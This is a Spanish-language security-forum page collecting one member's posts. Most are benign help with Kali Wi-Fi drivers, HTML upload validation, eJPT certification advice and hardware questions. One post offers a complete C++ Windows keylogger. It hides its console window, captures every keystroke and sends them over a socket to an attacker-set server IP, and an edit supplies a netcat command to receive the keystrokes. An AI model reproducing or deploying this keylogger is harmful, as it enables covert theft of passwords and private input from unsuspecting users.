This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - Lautaro Villarreal Culic'

Pages: [1] 2 3 ... 12
1
Buenas,
Ese kali linux que mostras está como SO base? o también emulado dentro de un virtual box?

Por otro lado,
tenes la virtualización habilitada desde la BIOS?

Saludos

2
Dudas y pedidos generales / Re: ayuda con hack the box
« on: August 03, 2021, 12:03:07 pm »
No sé si el método es el mismo de hace un par de años, pero si sigue siendo el mismo: Aprende a usar CURL, es necesario.


Saludos


EDIT: Si estás iniciando en la seguridad informática te recomiendo que empieces por una web llamada TryHackMe, es más recomendable para los que empiezan ya que te explican paso a paso las cosas que uno hace, luego cuando tengas más conocimientos ve a Hack The Box.

3
Dudas y pedidos generales / Re: Kali no me detecta placa Wifi Usb
« on: August 02, 2021, 10:02:58 am »
Encontré este post en Stack Exchange de hace unos años con tu mismo chipset y problema, miralo y seguí esas sugerencias

You are not allowed to view links. Register or Login

contanos cómo te fue


Saludos

4
Dudas y pedidos generales / Re: Kali no me detecta placa Wifi Usb
« on: July 31, 2021, 06:50:36 am »
si colocas
Code: You are not allowed to view links. Register or Login
airmon-ng check killy luego
Code: You are not allowed to view links. Register or Login
airmon-ng start wlan0
que error te tira?

5
Dudas y pedidos generales / Re: Kali no me detecta placa Wifi Usb
« on: July 30, 2021, 11:29:01 pm »
Yo hace no mucho compré el chipset Ralink 3070. Hace tiempo era uno de los más conocidos para hacer auditorías y trabajar con estas cosas desde kali o donde sea. Pero a partir del Kali 2020 dejó de ser compatible con este chipset. Lo que me obligo a crearme un live USB de 8GB solo con wifislax para directamente trabajar con cosas que tengan que ver seguridad wireless.

No es que nos queremos sacar tu problema de encima, pero como te comentó el amigo AXCESS, es mejor usar Wifislax, y si vos decís que te funciona de maravilla entonces hermano no te queda otra. Por varios motivos, el primero, por algo existen distribuciones especializadas en determinadas áreas. Además de ser súper portables como te comenté en mi caso, hay herramientas y drivers de todo tipo para cualquier tipo de chipsets.
Lo segundo, usar Kali para todo no siempre es la mejor opción, "casarse" con una distribución o sistemas operativos te acorta todas las posibilidades y te hace perder el tiempo muchas veces. Por otro lado, cuando queres arreglar una cosa por un lado como esta terminas desconfigurando otra cosa, y así vas acarreando problemas.

Por algún motivo existen distros de wifislax, y tu problema es uno de ellos.


Saludos

6
Dudas y pedidos generales / Re: Kali no me detecta placa Wifi Usb
« on: July 28, 2021, 07:22:35 pm »
Estuve viendo y según kali o virtual box tenes el chipset RTL8812AU, vi que un usuario tenía el mismo problema que vos y el fallo estaba en que en realidad el chipset no es el que le mostraba el comando lsusb sino que el chip en realidad era el RTL8812BU.

En caso de que mi anterior comentario no te funcione, sigue los siguientes comandos

Code: You are not allowed to view links. Register or Login
sudo apt-get update
luego
Code: You are not allowed to view links. Register or Login
sudo apt-get install build-essential dkms git
luego
Code: You are not allowed to view links. Register or Login
sudo git clone https://github.com/cilynx/rtl88x2BU_WiFi_linux_v5.2.4.4_26334.20180126_COEX20171012-5044.git
luego
Code: You are not allowed to view links. Register or Login
cd rtl88x2BU_WiFi_linux_v5.2.4.4_25643.20171212_COEX20171012-5044
luego
Code: You are not allowed to view links. Register or Login
sudo VER=$(cat ./version)
luego
Code: You are not allowed to view links. Register or Login
sudo rsync -rvhP ./ /usr/src/rtl88x2bu-${VER}
luego
Code: You are not allowed to view links. Register or Login
sudo dkms add -m rtl88x2bu -v ${VER}
luego
Code: You are not allowed to view links. Register or Login
sudo dkms build -m rtl88x2bu -v ${VER}
luego
Code: You are not allowed to view links. Register or Login
sudo dkms install -m rtl88x2bu -v ${VER}
luego
Code: You are not allowed to view links. Register or Login
sudo modprobe 88x2bu
reinicia el sistema operativo y siempre asegúrate de que tu adaptador esté seleccionado (como te indiqué en la primer respuesta) tanto antes de hacer estos pasos como después.

Saludos

7
Dudas y pedidos generales / Re: Kali no me detecta placa Wifi Usb
« on: July 28, 2021, 07:15:11 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Hola Bestia, te pregunto si ya intentaste conectarla a la VM la placa USB, porque cuando vos conectas algo a la máquina mediante USB, esta se conecta al host (windows), y si queres conectarlo a la máquina debes hacerlo desde la opción de dispositivos. Mira la siguiente imagen:



Con el USB de la placa ya conectado, vas a la sección de dispositivos y luego conectas el USB

Saludos

Me ganaste de mano! jajaja
Es eso mismo que te indica Lautaro!

Jajajajajaj  ;D ;D ;D

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Hola Bestia, te pregunto si ya intentaste conectarla a la VM la placa USB, porque cuando vos conectas algo a la máquina mediante USB, esta se conecta al host (windows), y si queres conectarlo a la máquina debes hacerlo desde la opción de dispositivos. Mira la siguiente imagen:



Con el USB de la placa ya conectado, vas a la sección de dispositivos y luego conectas el USB

Saludos






Hola si si, ya me asegure que estuviera conectada, no se porque razon Kali no me la detecta como una palca wifi, si miras la primera imagen del primer post incluso kali reconoce que hay un usb conectado en esa ranura y todo.



Entonces tampoco te lo detecta colocandolo desde la parte de dispositivos??

Veamos si te funciona instalando los drivers desde kali

Code: You are not allowed to view links. Register or Login
sudo apt-get update && apt-get upgrade
luego
Code: You are not allowed to view links. Register or Login
sudo apt-get install linux-headers-$(uname -r)
luego
Code: You are not allowed to view links. Register or Login
sudo apt-get install git
luego
Code: You are not allowed to view links. Register or Login
sudo git clone https://github.com/aircrack-ng/rtl8812au
luego
Code: You are not allowed to view links. Register or Login
sudo apt-get install dkms
luego
Code: You are not allowed to view links. Register or Login
sudo cd rtl8812au
luego
Code: You are not allowed to view links. Register or Login
sudo ./dkms-install.sh
luego
Code: You are not allowed to view links. Register or Login
sudo ./dkms-remove.sh
luego
Code: You are not allowed to view links. Register or Login
dkms statusdebe reconocerte el adaptador wifi.
En caso de que luego del ultimo comando te haya funcionado, reinicia el sistema operativo.

Una vez hayas reiniciado el sistema operativo coloca
Code: You are not allowed to view links. Register or Login
sudo airmon-ng check kill
y por ultimo podes ejecutar el comando
Code: You are not allowed to view links. Register or Login
iwconfig o
Code: You are not allowed to view links. Register or Login
ifconfig
Saludos

8
Dudas y pedidos generales / Re: Kali no me detecta placa Wifi Usb
« on: July 28, 2021, 09:11:09 am »
Hola Bestia, te pregunto si ya intentaste conectarla a la VM la placa USB, porque cuando vos conectas algo a la máquina mediante USB, esta se conecta al host (windows), y si queres conectarlo a la máquina debes hacerlo desde la opción de dispositivos. Mira la siguiente imagen:



Con el USB de la placa ya conectado, vas a la sección de dispositivos y luego conectas el USB

Saludos

9
Hacking / Re: Mi experiencia con la certificación eJPT + consejos
« on: July 23, 2021, 03:59:35 am »
You are not allowed to view links. Register or Login
Felicidades bro, veo algo de C++ a que nivel se requiere por lo menos estar con este lenguaje
para poder pasarlo sin problemas?, no me llevo mal con C\C++ pero mis conocimientos son basico
he intermedios.

@Sic
Amigo disculpame la demora en responder, no creí que iban a hacerlo sinceramente jajaja
Tranqui que en el examen no se ve nada acerca de programación.
Te enseñan lo básico de c++, haces un ejercicio en el curso (obviamente esta la forma de hacerlo a modo de respuesta paso a paso y explicado como en todos los labs del curso). Así que tranqui, si mal no recuerdo en c++ a modo de práctica hay que hacer un keylogger y ejecutarlo en el equipo víctima preparando un puerto de escucha con netcat en el equipo atacante y ya está, pero tranqui que no tenes que programar nada en el examen.

10
Dudas y pedidos generales / Re: Validar campo Imput
« on: July 23, 2021, 03:44:11 am »
Hola Rebe! Como estas?

Mira, te comento. Me descargue tu código y lo hice solo en un archivo HTML para que se me haga más cómodo.

No entendí la parte de que "no te permita seguir". Al menos, con este código html que ahora te pasaré, cuando intentas colocar en el botón "Abrir" sin seleccionar ningún archivo no te abre nada, es decir, no hace nada. Directamente no selecciona nada.

Por otro lado, como buenas prácticas, te sugiero que a las validaciones las hagas desde el campo input y no desde un script, por ejemplo, como atributo en el campo input que anteriormente mencionabamos, hay un atributo que se llama "accept".
En el que le pones por ejemplo, si queres que solo se suban imágenes colocas accept="images/*" (el aterisco selecciona todas las imágenes que sean compatibles con HTML, por ejemplo, para que solo puedas subir videos colocas accept="video/*", o podes especificar con accept="video/mp4".
En tu caso, ví que solo queres permitir subir archivos jpg, png y gifs, lo ideal sería colocarle el atributo (como se ve en el código de abajo) lo siguiente: accept="image/,.jpg,.png,.gif" no olvides colocar una , delante de cada extensión.
Así con esto te ahorras hacer la validación mediante un script y de paso evitas algún tipo de fallo de seguridad.
Luego, en el atributo del input "onchange" el return está de más, ya que es redundante. De esta forma, si en la ventana de windows a la hora de seleccionar un archivo, colocas la opción "Todos los archivos (*)" y elijes un .txt, salta el script que vos abajo colocaste.


Code: You are not allowed to view links. Register or Login
<html>

    <body>

        <div class="mb-3 fondo">
            <label for="exampleFormControlInput1" class="form-label"><b>Elija una Imagen (2)</b></label>
            <input type="file" class="form-control" name="my_files[]" multiple accept="image/,.jpg,.png,.gif" id="archivoInput" onchange="validarExt()">
        </div>

    <script>
     
            function validarExt()
            {
                var archivoInput = document.getElementById('archivoInput');
                var files = document.getElementById('archivoInput').files;
           
                var archivoRuta = archivoInput.value;
                var extPermitidas = /(.png|.gif|.jpg)$/i;
                if(!extPermitidas.exec(archivoRuta)){
                    alert('Asegurese de haber seleccionado una Imagen');
                    archivoInput.value = '';
                    return false;
                }
                if (!files.length) {
                alert('selecciones un fila !');
                return false;


                }
            }
    </script>

    </body>

</html>

Saludosss

Edit:
Cuidado Rebe con el atributo "multiple" del input, porque si seleccionas un archivo .png y un .txt con la opción "Todos los archivos (*)" te permite subir ambos archivos y se salta la validación

11
Hacking / Mi experiencia con la certificación eJPT + consejos
« on: July 16, 2021, 06:57:59 pm »
Buenas underc0ders, quería compartirles mi experiencia con el curso del eJPT (gratuito) y la certificación (200 USD).

El día 13 de Julio por la madrugada obtuve la certificación eJPT, la cual hasta el día de hoy la considero como un primer paso de una serie de certificaciones que tengo planeado seguir.

Esta podemos dividirla en dos partes. La primera es la preparación, esta es opcional, es decir, no es necesario hacerlo para poder rendir el examen, aunque considero que para los que estamos empezando sería una muy buena idea tomar el curso. Ya que es gratuito con el Starter Pass de INE, solo debemos registrarnos You are not allowed to view links. Register or Login. En cambio la certificación es impartida por eLearnSecurity You are not allowed to view links. Register or Login, a un costo razonable.



El curso (PTS)
La preparación para el examen se divide en tres partes, Penetration Testing Prerequisites -> Penetration Testing: Preliminary Skills & Programming -> Penetration Testing Basics.

Primera parte


Segunda parte


Tercera parte


Penetration Testing Prerequisites
En esta parte se ve las bases de los protocolos, networking, cookies, routing, etc. Contamos con un lab de Burpsuite, uno de exfiltración de datos, de routing y wireshark.

Debido a que este curso fue hecho en 2015, hay algunas características en herramientas como Burpsuite que no la tenemos hoy en la versión community, como el Spider.

Penetration Testing: Preliminary Skills & Programming
Por otro lado, en la segunda parte veremos (de forma muy básica) programación en C++, Python y Bash.

Las prácticas son muy buenas, aunque si no tenes experiencia en programación puede que se vuelva un poco difícil, ya que tratarás con sockets. En unos de los labs por ejemplo tendrás que hacer un Keylogger en C++.

Penetration Testing Basics
Lo bonito al final y eso INE lo entiende muy bien. En esta última parte veremos metodología de pentesting, escaneos con Nessus, Nmap, enumeraciones, cracking de hashes, explotaciones con Metasploit, google hacking, los verbos HTTP, explotaciones XSS, SQL, etc.

Considero que es muy completa, cada técnica muy bien explicada con su respectiva área de práctica. Teniendo en cuenta que desde hace unos meses este curso está 100% gratuito, no hay nada en lo que se pueda mejorar. Teniendo en cuenta que esta preparación es para personas iniciadas en el Pentesting.

En general...
La duración de este es de 38 horas aproximadamente.

Cada laboratorio contiene un archivo VPN en el que te conectas mediante openVPN con el usuario y clave que INE te proporciona.

Recomiendo tomarlo por más que no le interese hacer la certificación, y más aún si está iniciando en la ciberseguridad (aunque considero que hay mini conceptos que deben conocerse previamente).

El examen (eJPT)
eLearnSecurity es muy generoso con el tiempo de entrega del examen, nos provee 72 horas para responder correctamente un mínimo de 15 preguntas sobre 20. Son preguntas con opciones múltiples de respuesta (multiple choice).

En caso de que les vaya mal no se desanimen porque tendremos una oportunidad de volver a realizar el examen de forma gratuita.

Por más que el examen tenga sus años, todas las herramientas que hoy tenemos actualizadas pueden usarse perfectamente.

El examen puede realizarse con el contenido del curso, no se pondrá en prueba nada que no esté en el PTS.

Tanto INE como eLearnSecurity nos aclaran que no se trata de un CTF, y en cierto modo tienen razón en el caso del examen. Aunque en el PTS parezca que a veces hay que buscarle la vuelta a las soluciones y algunas de estas es difícil de ver en un entorno real (sobre todo en unas de las Black-box labs del final de la tercera parte, donde encontramos credenciales de una base de datos en la respuesta de los Headers).

Algunos consejos
No tengan miedo de ver las soluciones en los laboratorios, estos están hechos para que nosotros aprendamos, no para hacerlo bien a la primera. Hazlos la cantidad de veces que sea necesarias hasta que te quede claro lo que estás haciendo.

  • Lean TODAS las preguntas (y bien) antes de comenzar el examen.
  • Háganse un pequeño .txt con los comandos que usaron en los labs (sobre todo en los últimos 3).
  • Tómate tu tiempo. Si estás atascado ponte a hacer otras cosas y luego vuelve.
  • Asegurate de enumerar bien los hosts y prestar atención a los resultados.
  • Recuerda que para que un pentesting sea exitoso la clave está en recopilar toda la información posible.
  • Si en algún momento tenes la sensación de que algo no tiene sentido, puede que sea lo correcto.

Quote
Claramente esta certificación no hará que te lluevan ofertas de empleo, es más bien una puerta que considero necesario cruzar para seguir con otras certificaciones como el eCPPT, eWPTX, entre otras.

Imagina una escalera de certificaciones, el eJPT es el primer escalón.

Espero que les haya servido, sobre todo si están ingresando al mundo de la ciberseguridad y están buscando algún curso práctico y con un examen  ;D ;D

12
Que respuesta por parte de Facebook tan de pyme Argentina por Dios

13
Dudas y pedidos generales / Re: Al validar no me funciona el POST
« on: July 01, 2021, 04:00:17 am »
Hola Rebe como andas?
Tenes el archivo PrimerPost.php?

14
Underc0de / Re: Underc0de en Netflix!
« on: June 20, 2021, 07:14:56 pm »
Jjajajajaj increíble!!!!

15
Dudas y pedidos generales / Re: que pasa de bajo de un programa?
« on: May 27, 2021, 07:47:58 am »
Hola buenos días, además de lo que dijo blackdrake, me gustaría añadir que simplemente muchos scripts de scanner lo que hacen es comprobar la versión de lo que escanea, en este caso, la versión del cliente de SMB que se está ejecutando. Entonces, el script normalmente comprueba en una lista de versiones de ese programa/OS/servidor/etc y le asigna una vulnerabilidad a cada versión. Luego, dependiendo de la versión se te mostrará X vulnerabilidad.

Saludos

EDIT:
Si tenes acceso a ese script de python y puedes descargarlo, escribes "nano <nombredelscript>" y puedes leer el código fuente.
Ante estas dudas amigo, si queres iniciarte en la seguridad informática, te aconsejo que previamente veas fundamentos de la programación, o lo básico si es posible. Porque entender cómo y por qué funcionan ciertas cosas es fundamental.

16
Hacking / Keylogger en c++
« on: May 10, 2021, 02:50:20 am »
Hola muchachos, estoy repasando algunas cosas en C++ enfocado a la seguridad informática en general y me parece una buena idea dejarles el código de un Keylogger muy simple :D

Code: You are not allowed to view links. Register or Login
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, "Ws2_32.lib")
#include <iostream>
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

int main(){

    ShowWindow(GetConsoleWindow(), SW_HIDE);
    char KEY;

    WSADATA WSAData;
    SOCKET server;
    SOCKADDR_IN addr;


    WSAStartup(MAKEWORD(2, 0), &WSAData);
    server = socket(AF_INET, SOCK_STREAM, 0);
    addr.sin_addr.s_addr = inet_addr("IP DEL SERVIDOR"); //IP DEL SERVIDOR (Oyente).
    addr.sin_family = AF_INET;
    addr.sin_port = htons(5555); //Puerto de comunicación.
    connect(server, (SOCKADDR *)&addr, sizeof(addr));


        while(true){
            Sleep(10);
            for (int KEY = 0x8; KEY < 0xFF; KEY++){
               
                if (GetAsyncKeyState(KEY) == -32767){

                        char buffer[2];
                        buffer[0] = KEY;
                        send(server, buffer, sizeof(buffer), 0);
                }
            }
        }

        closesocket(server);
        WSACleanup();
}


EDIT:
Y si se preguntan... ok, pongo mi IP y el puerto está en el 5555. Como veo las pulsaciones?
Pueden hacerlo con netcat.
En linux, escriben el comando
Code: You are not allowed to view links. Register or Login
sudo nc -lvp 5555
Y dejan la sesión abierta.

Saludos!

17
JAJAJAJAJ @AXCESS no seas malo todos nos cargamos nuestro portátil por primera vez. Es parte del camino de aprendizaje  ;D ;D ;D

18
Claro, si tu USB es 3.0 y tu portátil no tiene ningún puerto USB 3.0 y tiene 2.0 la velocidad será la de un 2.0
En caso de que tu puerto SATA (lo cual debes averiguar muy bien eso, porque también hay muchas variedades) también se verá afectada. Por ejemplo, si conseguís un pen 3.0 y unos convertidores de los que comentas con 3.0 (el ejemplo que pasaste en el post original es 3.0) pero en el SATA de tu portátil es de los antiguos, también será menor velocidad.

O sea, llamemos transferencia 1 a la parte USB -> convertidor SATA / puerto USB de tu portátil (cualquiera de las dos opciones) y transferencia 2 a la parte del convertidor SATA a la unidad de destino.

La velocidad final será la de la transferencia 2.
Por ejemplo, en un pendrive USB 3.0 de 600MB/s conectado a un puerto USB 2.0 de 60MB/s, la velocidad del pendrive al puerto TEORICAMENTE serian de 600MB/s, pero la velocidad final, la que vos notarás, serán de 60MB/s. Esto es tanto para los USB como para cualquier medio de almacenamiento a la hora de transferir un archivo.
Pero eso, si aún así decides utilizar ese convertidor a SATA, te sugiero que, sea primero con entrada hembra, segundo, que sea el mismo SATA que la entrada de tu portátil (lee el manual del portátil) y por último, que el conversor venga con un CD de los drivers, o algún manual para que puedas descargarlo o buscar en algún foro acerca de su instalación. Es decir, que no sea genérico.

Saludos

19
Hola amigo, te comento. Primero que nada el artículo no es el que necesitas.
Entiendo que tenes un pendrive, el pendrive tiene un USB macho, que va en un puerto del PC, hembra.
El artículo que pasaste tiene un USB macho, es decir, para insertar. Vos necesitarías algo similar pero para introducir jajaj.

De todos modos, un USB puede utilizarse como un Disco de almacenamiento. Al fin y al cabo son unidades de almacenamiento.
Yo por ejemplo, tengo 2 bahías para colocar discos (HDD - SSD), ambas ocupadas.
Entonces, me conseguí un pendrive de 256GB, el cual en el administrador de particiones de Windows, configuras la unidad del pendrive como una partición de disco. Eso sí, en la BIOS debe estar por debajo del arranque que el SSD/HDD que bootea el windows.

Andar con cables no tiene sentido, a no ser que tengas un ordenador de mesa y dejes el pendrive dentro de la torre.

En resumen, no es necesario comprar algo para hacer un disco un USB si lo configuras como tal.
Si conseguis el mismo aparato pero con entrada HEMBRA USB y no te molesta gastar, intentalo

Cualquier cosa estoy a tu disposición.
Saludos

EDIT: Me di cuenta que, ese artículo, es para colocar un HDD/SSD al puerto SATA y luego conectarlo al portátil con el USB.
En este caso, no sería lo que vos querés tampoco ya que vos queres usar un USB como disco.
Por otro lado tampoco sé si ese artículo tiene un USB macho para conectar un Disco externo mediante el SATA para ordenadores de escritorio.

De todos modos, seguí lo que te recomendé. Configura tu USB como un disco y no compres artilugios. Hay muchas guías.

20
Prueba ver el visor de eventos. Limpia todos los registros, haz la prueba y luego mira eso.
Si aparece algun error pasalo por acá.

Saludos

Pages: [1] 2 3 ... 12